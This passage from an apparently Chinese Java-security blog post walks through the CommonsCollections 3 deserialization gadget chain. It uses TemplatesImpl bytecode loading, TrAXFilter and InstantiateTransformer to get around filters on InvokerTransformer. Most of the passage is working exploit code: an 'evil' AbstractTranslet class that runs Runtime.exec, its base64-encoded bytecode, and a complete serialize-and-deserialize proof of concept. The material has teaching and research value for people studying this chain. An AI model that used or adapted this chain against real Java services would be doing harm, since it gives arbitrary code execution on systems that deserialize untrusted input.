                    _class[_transletIndex].getConstructor().newInstance();
            translet.postInitialization();
            translet.setTemplates(this);
            translet.setOverrideDefaultParser(_overrideDefaultParser);
            translet.setAllowedProtocols(_accessExternalStylesheet);
            if (_auxClasses != null) {
                translet.setAuxiliaryClasses(_auxClasses);
            }

return translet;
 }
 catch (InstantiationException | IllegalAccessException |
 NoSuchMethodException | InvocationTargetException e) {
 ErrorMsg err = new ErrorMsg(ErrorMsg.TRANSLET_OBJECT_ERR, _name);
 throw new TransformerConfigurationException(err.toString(), e);
 }
 }</code></pre>也是一个<code>private</code>方法，再找找到了<code>newTransformer()</code>方法，终于是一个public方法了，可以直接调用：<pre><code class="lang-java">public synchronized Transformer newTransformer()
 throws TransformerConfigurationException
 {
 TransformerImpl transformer;

transformer = new TransformerImpl(getTransletInstance(), _outputProperties,
            _indentNumber, _tfactory);//调用了getTransletInstance方法

if (_uriResolver != null) {
            transformer.setURIResolver(_uriResolver);
        }

if (_tfactory.getFeature(XMLConstants.FEATURE_SECURE_PROCESSING)) {
 transformer.setSecureProcessing(true);
 }
 return transformer;
 }</code></pre>整个链子：<pre><code>TemplatesImpl#newTransformer() -&gt; TemplatesImpl#getTransletInstance() -&gt; TemplatesImpl#defineTransletClasses() -&gt; TransletClassLoader#defineClass()</code></pre>这里用反射设置<code>TemplatesImpl</code>对象的三个私有属性保证每步被正常调用到：<ul><li><code>_bytecodes</code> 是由字节码组成的数组； 在<code>defineTransletClasses()</code>方法中<code>if</code>会判断传入的字节码的父类要是<code>ABSTRACT_TRANSLET</code> 也就是需要继承这个包<code>com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet</code> 所以我们还得构造一个特殊的类，用这个类生成字节码</li><li><code>_name</code> 可以是任意字符串，只要不为 null 即可；</li><li><code>_tfactory</code> 需要是一个<code>TransformerFactoryImpl</code> 对象； 因为<code>TemplatesImpl#defineTransletClasses()</code> 方法里有调用到 <code>_tfactory.getExternalExtensionsMap()</code> 如果是<code>null</code>会出错</li></ul>_bytecodes：<pre><code class="lang-java">import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;

public class evil extends AbstractTranslet {
 public void transform(DOM document, SerializationHandler[] handlers)
 throws TransletException {}
 public void transform(DOM document, DTMAxisIterator iterator,
 SerializationHandler handler) throws TransletException {}
 public evil() throws Exception{
 super();
 String[] command = {&quot;calc.exe&quot;};
 Runtime.getRuntime().exec(command);
 }
}</code></pre>编译这个类得到字节码后就可以写一个简单的手动执行的POC了<pre><code class="lang-java">import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import java.lang.reflect.Field;
import java.util.Base64;
public class defineclass {
 public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {
 Field field = obj.getClass().getDeclaredField(fieldName);
 field.setAccessible(true);
 field.set(obj, value);
 }
 public static void main(String[] args) throws Exception {
 byte[] code = Base64.getDecoder().decode(&quot;yv66vgAAADQAIwoABwAUBwAVCAAWCgAXABgKABcAGQcAGgcAGwEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAApFeGNlcHRpb25zBwAcAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABjxpbml0PgEAAygpVgcAHQEAClNvdXJjZUZpbGUBAAlldmlsLmphdmEMAA8AEAEAEGphdmEvbGFuZy9TdHJpbmcBAAhjYWxjLmV4ZQcAHgwAHwAgDAAhACIBABN5c29zZXJpYWwvdGVzdC9ldmlsAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAOWNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9UcmFuc2xldEV4Y2VwdGlvbgEAE2phdmEvbGFuZy9FeGNlcHRpb24BABFqYXZhL2xhbmcvUnVudGltZQEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsBAARleGVjAQAoKFtMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwAhAAYABwAAAAAAAwABAAgACQACAAoAAAAZAAAAAwAAAAGxAAAAAQALAAAABgABAAAACwAMAAAABAABAA0AAQAIAA4AAgAKAAAAGQAAAAQAAAABsQAAAAEACwAAAAYAAQAAAA0ADAAAAAQAAQANAAEADwAQAAIACgAAADsABAACAAAAFyq3AAEEvQACWQMSA1NMuAAEK7YABVexAAAAAQALAAAAEgAEAAAADwAEABAADgARABYAEgAMAAAABAABABEAAQASAAAAAgAT&quot;);
 TemplatesImpl obj = new TemplatesImpl();
 setFieldValue(obj, &quot;_bytecodes&quot;, new byte[][] {code});
 setFieldValue(obj, &quot;_name&quot;, &quot;L1mbo&quot;);
 setFieldValue(obj, &quot;_tfactory&quot;, new TransformerFactoryImpl());
 obj.newTransformer();
 }
}</code></pre><h2>cc3</h2>即使前面已经有了强大的cc6链，但现在很多过滤器都会过滤掉<code>InvokerTransformer</code>，这样之前的链子就打不通，所以得找个类代替它来绕过过滤，这个类就是<code>org.apache.commons.collections.functors.InstantiateTransformer</code><code>InstantiateTransformer</code>类也是实现了<code>Transformer</code>接口的一个类<pre><code class="lang-java">public class InstantiateTransformer implements Transformer, Serializable {
 public Object transform(Object input) {
 try {
 if (!(input instanceof Class)) {
 throw new FunctorException(&quot;InstantiateTransformer: Input object was not an instanceof Class, it was a &quot; + (input == null ? &quot;null object&quot; : input.getClass().getName()));
 } else {
 Constructor con = ((Class)input).getConstructor(this.iParamTypes);
 return con.newInstance(this.iArgs);
 }
 } catch (NoSuchMethodException var6) {
 throw new FunctorException(&quot;InstantiateTransformer: The constructor must exist and be public &quot;);
 } catch (InstantiationException var7) {
 throw new FunctorException(&quot;InstantiateTransformer: InstantiationException&quot;, var7);
 } catch (IllegalAccessException var8) {
 throw new FunctorException(&quot;InstantiateTransformer: Constructor must be public&quot;, var8);
 } catch (InvocationTargetException var9) {
 throw new FunctorException(&quot;InstantiateTransformer: Constructor threw an exception&quot;, var9);
 }
 }
}</code></pre>可以看出它可以调用指定类得构造方法，也就是找到一个构造方法调用<code>TransformerImpl</code>类中的<code>newTransformer()</code>方法的类<code>com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter</code>这个类的构造方法中，就正好调用了<code>(TransformerImpl) templates.newTransformer()</code>，且前面的<code>Templates</code>对象可控，<pre><code class="lang-java">public class TrAXFilter extends XMLFilterImpl {
 private Templates _templates;
 private TransformerImpl _transformer;
 private TransformerHandlerImpl _transformerHandler;
 private boolean _overrideDefaultParser;

public TrAXFilter(Templates templates) throws TransformerConfigurationException
 {
 _templates = templates;
 _transformer = (TransformerImpl) templates.newTransformer(); // &lt;--此处调用
 _transformerHandler = new TransformerHandlerImpl(_transformer);
 _overrideDefaultParser = _transformer.overrideDefaultParser();
 }
}</code></pre>这样就能利用<code>InstantiateTransformer</code>的<code>transform()</code>来调用到<code>TrAXFilter</code>的构造方法，那么它就会自动调用<code>templates.newTransformer()</code>，就可以加载我们放在<code>TemplatesImpl</code>里面的字节码所以<code>Transformer</code>数组就可以改写成<pre><code class="lang-java">Transformer[] transformers = new Transformer[]{
 new ConstantTransformer(TrAXFilter.class),
 new InstantiateTransformer(new Class[] { Templates.class }, new Object[] { obj })
 };</code></pre><h3>POC</h3><pre><code class="lang-java">import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InstantiateTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;

import javax.xml.transform.Templates;
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.util.HashMap;
import java.util.Map;

import java.lang.reflect.Field;
import java.util.Base64;

public class CommonsCollections_3 {
    public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {
        Field field = obj.getClass().getDeclaredField(fieldName);
        field.setAccessible(true);
        field.set(obj, value);
    }

public static void main(String[] args) throws Exception {
        Transformer[] faketransformers = new Transformer[]{new ConstantTransformer(1)};
        byte[] code = Base64.getDecoder().decode(&quot;yv66vgAAADQAIwoABwAUBwAVCAAWCgAXABgKABcAGQcAGgcAGwEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAApFeGNlcHRpb25zBwAcAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABjxpbml0PgEAAygpVgcAHQEAClNvdXJjZUZpbGUBAAlldmlsLmphdmEMAA8AEAEAEGphdmEvbGFuZy9TdHJpbmcBAAhjYWxjLmV4ZQcAHgwAHwAgDAAhACIBABN5c29zZXJpYWwvdGVzdC9ldmlsAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAOWNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9UcmFuc2xldEV4Y2VwdGlvbgEAE2phdmEvbGFuZy9FeGNlcHRpb24BABFqYXZhL2xhbmcvUnVudGltZQEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsBAARleGVjAQAoKFtMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwAhAAYABwAAAAAAAwABAAgACQACAAoAAAAZAAAAAwAAAAGxAAAAAQALAAAABgABAAAACwAMAAAABAABAA0AAQAIAA4AAgAKAAAAGQAAAAQAAAABsQAAAAEACwAAAAYAAQAAAA0ADAAAAAQAAQANAAEADwAQAAIACgAAADsABAACAAAAFyq3AAEEvQACWQMSA1NMuAAEK7YABVexAAAAAQALAAAAEgAEAAAADwAEABAADgARABYAEgAMAAAABAABABEAAQASAAAAAgAT&quot;);
        TemplatesImpl obj = new TemplatesImpl();
        setFieldValue(obj, &quot;_bytecodes&quot;, new byte[][]{code});
        setFieldValue(obj, &quot;_name&quot;, &quot;L1mbo&quot;);
        setFieldValue(obj, &quot;_tfactory&quot;, new TransformerFactoryImpl());
        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(TrAXFilter.class),
                new InstantiateTransformer(new Class[]{Templates.class}, new Object[]{obj})
        };
        Transformer transformersChain = new ChainedTransformer(faketransformers);

Map innerMap = new HashMap();
        Map outerMap = LazyMap.decorate(innerMap, transformersChain);

TiedMapEntry tme = new TiedMapEntry(outerMap, &quot;keykey&quot;);

Map expMap = new HashMap();
        expMap.put(tme, &quot;valuevalue&quot;);
        outerMap.remove(&quot;keykey&quot;);

setFieldValue(transformersChain, &quot;iTransformers&quot;, transformers);

// ⽣成序列化字符串
        ByteArrayOutputStream barr = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(barr);
        oos.writeObject(expMap);
        oos.close();

System.out.println(barr);
 ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray()));
 Object o = (Object) ois.readObject();
 }
}</code></pre>

CommonsCollections 3

动态类加载机制

利用TemplatesImpl加载字节码实现任意代码执行

cc3

POC

发表评论 取消回复 使用cookie技术保留您的个人信息以便您下次快速评论，继续评论表示您已同意该条款

JAVA安全-CommonsCollections 3

发表评论取消回复
使用cookie技术保留您的个人信息以便您下次快速评论，继续评论表示您已同意该条款